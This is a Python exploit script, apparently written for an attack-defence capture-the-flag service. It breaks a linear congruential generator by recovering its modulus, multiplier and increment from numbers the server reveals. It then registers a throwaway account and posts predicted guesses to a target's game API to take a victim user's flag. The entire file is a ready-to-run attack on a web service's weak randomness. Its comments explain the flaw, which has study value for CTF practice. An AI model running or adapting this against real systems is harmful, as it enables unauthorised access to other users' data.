#!/usr/bin/env python3
import random
import secrets
import string
import sys
from math import gcd

import requests
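def break_lcg(obs):
    """Recover the parameters of a linear congruential generator from its outputs.

    The generator is assumed to be ``x[n+1] = (a * x[n] + c) mod m`` with every
    output revealed in full.  Consecutive differences ``t[n] = x[n+1] - x[n]``
    satisfy ``t[n+1] = a * t[n] (mod m)`` (the increment cancels), so products
    such as ``t[n+1]**2 - t[n+2]*t[n]`` are multiples of ``m``.  Their gcd
    recovers ``m`` -- or a small multiple of it when few outputs are given --
    after which ``a`` and ``c`` follow from the first three outputs.  This only
    works because the service hands out raw generator state; a CSPRNG
    (``secrets``/``os.urandom``) would make the numbers unpredictable.

    Args:
        obs: at least four consecutive generator outputs, as ints.

    Returns:
        ``(c, a, m)`` -- increment, multiplier, modulus, in that order -- or
        ``(0, 0, 0)`` when the parameters cannot be recovered: fewer than four
        observations, a constant sequence, or ``obs[1] - obs[0]`` not
        invertible modulo the recovered modulus.  Callers must treat a zero
        modulus as failure.  The recovered modulus may be a multiple of the
        true one, in which case predictions made with it diverge after a few
        steps, so callers should verify against fresh outputs.
    """
    if len(obs) < 4:
        return (0, 0, 0)
    # Consecutive differences: t[n] = a * t[n-1] (mod m).
    t = [b - a for a, b in zip(obs, obs[1:])]
    # Each entry is a (possibly negative) multiple of the modulus; using three
    # independent families of relations makes the gcd far more likely to be
    # exactly m rather than a multiple of it.
    vals = [t[i + 1] ** 2 - t[i + 2] * t[i] for i in range(len(t) - 2)]
    vals += [t[i + 3] * t[i] - t[i + 2] * t[i + 1] for i in range(len(t) - 3)]
    vals += [t[i + 4] * t[i] - t[i + 3] * t[i + 1] for i in range(len(t) - 4)]
    # gcd(0, v) == |v|, so folding from 0 covers every entry and always yields
    # a non-negative modulus; a constant sequence leaves z == 0.
    z = 0
    for v in vals:
        z = gcd(z, v)
    if z == 0:
        return (0, 0, 0)
    try:
        # a = t[1] / t[0] (mod m).  pow(base, -1, mod) needs Python 3.8+ and
        # raises ValueError when t[0] shares a factor with z.
        y = (pow(t[0], -1, z) * t[1]) % z
    except ValueError:
        return (0, 0, 0)
    # c = x[1] - a * x[0] (mod m).
    x = (obs[1] - obs[0] * y) % z
    return (x, y, z)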
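def attempt(s, ip, victim, *, max_guesses=100, timeout=10):
    """Play one game against ``victim`` and try to extract its Treasure description.

    Starts an attack, spends the first six rounds collecting the numbers the
    server reveals, recovers the LCG behind them with :func:`break_lcg`, then
    submits the predicted next outputs as guesses until the server hands over
    the victim's items or ends the game.

    Args:
        s: a ``requests.Session`` (or anything with a compatible ``post``)
            already authenticated against the target.
        ip: target host; the API is assumed to listen on port 5000 over
            plain HTTP.
        victim: user id whose inventory is the goal.
        max_guesses: upper bound on predicted guesses submitted before giving
            up, so a server that never answers ``GameOver!`` cannot hang the
            exploit runner.
        timeout: per-request timeout in seconds passed to ``post``.

    Returns:
        The Treasure's ``personal_description`` (the flag) on success, or the
        string ``"No flag found"`` on every failure path.  Missing
        ``attack_id``/``number``/``items`` fields are treated as failure
        rather than raising ``KeyError``; transport errors raised by the
        session propagate unchanged.
    """
    base = f'http://{ip}:5000/api/users/{victim}/attack'
    start = s.post(f'{base}/start', timeout=timeout).json()
    if 'attack_id' not in start:
        return "No flag found"
    guess_url = f"{base}/{start['attack_id']}"

    # Phase 1: harvest six revealed numbers.  The guess value is irrelevant
    # here -- we only need the server to tell us what it drew.  Six outputs
    # give break_lcg enough relations to pin down the modulus.
    observations = []
    for _ in range(6):
        r = s.post(guess_url, json={'guess': 3}, timeout=timeout).json()
        if 'number' not in r:
            # No number to observe; if the fixed guess happened to win, the
            # response presumably carries the items, so take the win.
            return _treasure_description(r.get('items', []))
        observations.append(r['number'])

    x, y, z = break_lcg(observations)
    if z == 0:
        return "No flag found"

    # Phase 2: predict forward from the last revealed number.  If z is a
    # multiple of the true modulus the predictions are wrong and the server
    # eventually answers GameOver!; the caller then retries with a fresh game.
    w = observations[-1]
    for _ in range(max_guesses):
        w = (w * y + x) % z
        r = s.post(guess_url, json={'guess': w}, timeout=timeout).json()
        if "message" not in r:
            # A response without a message is the win: it lists the items.
            return _treasure_description(r.get('items', []))
        if r['message'] == 'GameOver!':
            return "No flag found"
    return "No flag found"


def _treasure_description(items):
    """Return the personal_description of the item named "Treasure", else "No flag found"."""
    for item in items:
        if item.get("name") == "Treasure":
            return item.get("personal_description", "No flag found")
    return "No flag found"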
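def exploit(ip, flag_id, *, retries=5, timeout=10):
    """Register a throwaway account on the target and steal ``flag_id``'s flag.

    ``flag_id`` is used directly as the victim's user id.  A fresh account is
    created and logged in so the session holds whatever credential the
    service issues, then :func:`attempt` is played up to ``retries`` times,
    because the LCG recovery can yield a multiple of the true modulus and a
    single game may be lost.

    Args:
        ip: target host (API assumed on port 5000, plain HTTP).
        flag_id: victim user id as handed out by the game server.
        retries: maximum number of games to play before giving up.
        timeout: per-request timeout in seconds for the registration and
            login calls, so an unresponsive target cannot hang the runner.

    Returns:
        The flag string, or ``"No flag found"``.
    """
    s = requests.Session()
    # Throwaway credentials.  secrets rather than random: nothing here depends
    # on the password staying secret, but credentials should never come from
    # the non-cryptographic PRNG -- the very weakness this script exploits.
    alphabet = string.ascii_letters
    username = ''.join(secrets.choice(alphabet) for _ in range(20))
    password = ''.join(secrets.choice(alphabet) for _ in range(20))
    creds = {'username': username, 'password': password}
    # Responses are deliberately not inspected; if registration or login fails
    # the attempts below presumably run unauthenticated and come back empty.
    s.post(f'http://{ip}:5000/api/register', json=creds, timeout=timeout)
    s.post(f'http://{ip}:5000/api/login', json=creds, timeout=timeout)
    for _ in range(retries):
        res = attempt(s, ip, flag_id)
        if res != "No flag found":
            return res
    return "No flag found"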
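if __name__ == "__main__":
    # Invoked by the attack runner as: exploit_rng.py <target-ip> <flag-id>.
    # Fail with a usage line instead of an IndexError when arguments are missing.
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} <ip> <flag_id>")
    ip = sys.argv[1]
    flag_id = sys.argv[2]
    print(exploit(ip, flag_id))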